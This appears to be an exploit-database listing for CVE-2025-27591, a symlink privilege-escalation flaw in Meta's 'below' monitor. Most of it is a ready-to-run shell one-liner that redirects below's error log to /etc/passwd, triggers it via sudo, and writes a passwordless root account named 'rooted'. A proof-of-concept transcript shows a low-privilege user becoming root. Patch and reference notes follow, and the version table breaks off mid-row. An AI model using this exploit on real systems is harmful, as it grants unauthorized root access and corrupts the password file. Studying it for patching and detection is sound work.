Exploit for Incorrect Permission Assignment for Critical Resource in Facebook Below CVE-2025-27591

Name: Exploit for Incorrect Permission Assignment for Critical Resource in Facebook Below CVE-2025-27591
Rating: 5 (149 reviews)

2026-04-16 | CVSS 6.8

## https://sploitus.com/exploit?id=404E5158-75A6-50A2-9358-8E98A9BEE66E
# CVE-2025-27591 — Meta `below` Symlink Local Privilege Escalation

## Overview

| Field | Details |
|---|---|
| **CVE** | CVE-2025-27591 |
| **Software** | Meta `below` (system resource monitor) |
| **Affected Versions** |  **Prerequisite:** The current user must have `sudo` rights to execute `/usr/bin/below`.

### One-liner

```bash
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted
```

## Proof of Concept

```
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root
```

## Patch

The vulnerability was fixed in `below` version `0.9.0`. The fix introduces a symlink check before any file operations in the logging path.

## References

- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-27591)
- [Meta below GitHub](https://github.com/facebookincubator/below)